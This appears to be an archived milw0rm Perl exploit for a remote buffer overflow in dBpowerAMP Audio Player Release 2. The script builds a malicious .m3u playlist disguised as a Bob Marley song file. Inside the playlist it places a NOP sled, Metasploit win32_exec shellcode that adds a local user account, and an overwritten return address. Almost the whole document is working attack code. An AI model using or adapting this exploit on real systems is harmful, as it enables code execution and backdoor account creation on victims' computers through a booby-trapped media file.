42 lines
No EOL
1.4 KiB
Perl
Executable file
42 lines
No EOL
1.4 KiB
Perl
Executable file
####################################################################
|
|
#
|
|
# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow Exploit
|
|
#
|
|
#
|
|
#
|
|
#
|
|
#
|
|
#
|
|
#
|
|
$nop= "\x90" x 65;
|
|
#
|
|
# win32_exec - CMD=cmd /k net user /add secur frog Size=188 http://metasploit.comhttp://metasploit.com 253
|
|
#
|
|
my $shellcode =
|
|
"\x29\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c".
|
|
"\x91\xfa\x54\x83\xeb\xfc\xe2\xf4\x90\x79\xbe\x54\x6c\x91\x71\x11".
|
|
"\x50\x1a\x86\x51\x14\x90\x15\xdf\x23\x89\x71\x0b\x4c\x90\x11\x1d".
|
|
"\xe7\xa5\x71\x55\x82\xa0\x3a\xcd\xc0\x15\x3a\x20\x6b\x50\x30\x59".
|
|
"\x6d\x53\x11\xa0\x57\xc5\xde\x50\x19\x74\x71\x0b\x48\x90\x11\x32".
|
|
"\xe7\x9d\xb1\xdf\x33\x8d\xfb\xbf\xe7\x8d\x71\x55\x87\x18\xa6\x70".
|
|
"\x68\x52\xcb\x94\x08\x1a\xba\x64\xe9\x51\x82\x58\xe7\xd1\xf6\xdf".
|
|
"\x1c\x8d\x57\xdf\x04\x99\x11\x5d\xe7\x11\x4a\x54\x6c\x91\x71\x3c".
|
|
"\x50\xce\xcb\xa2\x0c\xc7\x73\xac\xef\x51\x81\x04\x04\x61\x70\x50".
|
|
"\x33\xf9\x62\xaa\xe6\x9f\xad\xab\x8b\xf2\x97\x30\x4c\xbe\x91\x74".
|
|
"\x02\xf4\x8e\x74\x19\xe2\x9f\x26\x4c\xbe\x9b\x30\x08\xb1\x89\x31".
|
|
"\x0f\xe4\x88\x74\x0a\xe3\x95\x33\x6c\x91\xfa\x54";
|
|
#
|
|
$eip = "\xe0\xec\xb8\x00";
|
|
#
|
|
$payload = "http://".$nop.$shellcode.$eip;
|
|
#
|
|
#
|
|
my $file="bob_marley_I_Shot_The_Sheriff.m3u";
|
|
#
|
|
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
|
|
print $FILE $payload;
|
|
close($FILE);
|
|
print "$file has been created \n";
|
|
print "Credits:Securfrog";
|
|
|
|
# milw0rm.com [2008-02-06] |